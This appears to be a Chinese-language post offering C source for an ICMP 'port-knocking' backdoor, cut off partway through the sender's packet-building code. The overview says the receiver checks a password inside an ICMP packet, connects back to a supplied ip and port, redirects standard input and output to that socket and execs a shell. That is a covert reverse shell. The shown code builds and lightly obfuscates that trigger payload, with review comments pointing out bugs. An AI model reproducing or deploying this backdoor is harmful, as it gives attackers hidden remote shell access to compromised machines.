#概述
1.创建原始套接字(icmp),分别为发送端和接收端,另外再起一个进程绑定一个端口进行tcp监听。
2.发送端向接收端发送icmp包,接收端过滤出该icmp包后进行解包和解密,当口令正确时,解析icmp_data段中的ip和port。
3.拿到ip和port后,创建一个tcp套接字去connect这个addr,连接成功后将stdin,stdout,stderr重定向到创建的套接字中,再execl反弹shell就完成了.
源码
发送端
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <setjmp.h>
#include <errno.h>
#define PACKET_SIZE 4096 /* size in bytes of the global ICMP send buffer below */
#define DATA_LEN 46      /* NOTE(review): 46 is smaller than sizeof(struct backcdoor) (40+10+5 = 55 bytes); where DATA_LEN is used lies outside this view — confirm it is not the copy length for the struct */
/* ICMP packet buffer: the raw packet is assembled here before sending */
char sendpacket[PACKET_SIZE]; // PACKET_SIZE bytes of packet build area
/* Payload carried in the ICMP data field: the shared secret ("password")
 * plus the ip and port the receiver should connect back to. The field
 * sizes are the wire layout shared with the receiver (not in this file).
 * cry_bd() only adds fixed byte offsets to it (+5 / +6 / +1), so the
 * payload is obfuscated, not encrypted, and is effectively plaintext on
 * the wire. */
struct backcdoor
{
char key[40];    /* shared secret; cry_bd() shifts its first 31 bytes unconditionally */
char cryip[10];  /* NOTE(review): a dotted IPv4 string needs up to 16 bytes incl. NUL, more than fit here — confirm the expected ip format */
char cryport[5]; /* port as text; "65535" fills all 5 bytes, leaving no room for a NUL */
};
typedef struct backcdoor backcdoor;
backcdoor send_bd; /* global payload instance for the sender; its use is outside this view */
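/* Forward declarations. Each function is defined later in this file;
 * the earlier duplicate declaration of cry_bd() was dropped and the
 * missing one for pack() added so every definition has one prototype. */
unsigned short cal_chksum(unsigned short *addr,int len);
void cry_bd(backcdoor*bd);
int pack(int pid, backcdoor*bd);
void send_packet(int sockfd,struct sockaddr_in *dst, int pid, backcdoor*bd);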
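/*
 * Internet (RFC 1071) ones'-complement checksum over len bytes at addr.
 *
 * This is NOT CRC32 (the original comment was wrong): it is the 16-bit
 * ones'-complement sum used by the IP and ICMP headers.
 *
 * addr: start of the data, read as 16-bit words in memory order; should
 *       be 2-byte aligned.
 * len:  byte count. A trailing odd byte is folded in as the low byte of a
 *       zero-padded word in host order (same convention as BSD ping).
 *       len <= 0 yields 0xffff.
 * Returns the checksum in memory byte order, ready to store in the header.
 */
unsigned short cal_chksum(unsigned short *addr,int len)
{
    const unsigned short *w = addr;
    unsigned int sum = 0; /* unsigned: no signed-overflow UB for large inputs */
    int nleft = len;

    /* Sum whole 16-bit words. */
    for (; nleft > 1; nleft -= 2) {
        sum += *w++;
    }

    /* Odd trailing byte: pad it with a zero byte (host order). */
    if (nleft == 1) {
        unsigned short last = 0;
        *(unsigned char *)&last = *(const unsigned char *)w;
        sum += last;
    }

    /* Fold the carries back into the low 16 bits; the second fold catches
     * the carry the first one can produce. */
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);

    return (unsigned short)~sum;
}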
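/*
 * Obfuscate the payload in place before it is sent.
 *
 * Despite the original "encrypt" label this is a fixed byte offset, not
 * encryption: the first 31 bytes of key each get +5 (the bound is fixed,
 * not strlen-based, so a shorter key has its NUL terminator and trailing
 * bytes shifted as well), cryport[0] gets +6 and cryip[0] gets +1. The
 * bounds and offsets are the contract with the receiver's inverse
 * (presumably mirrored there — not in this file), so they are kept
 * unchanged; only the unused strlen() call was removed, since it could
 * read past key[40] when key is not NUL-terminated.
 *
 * bd: payload to transform; must be non-NULL.
 */
void cry_bd(backcdoor*bd)
{
    enum { KEY_OBF_BYTES = 31 }; /* fixed span shifted; the receiver must use the same */

    for (int i = 0; i < KEY_OBF_BYTES; i++) {
        bd->key[i] += 5;
    }
    bd->cryport[0] += 6;
    bd->cryip[0] += 1;
}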
/*组包*/
int pack(int pid, backcdoor*bd)
{
struct icmp *icmp;
int packetsize=8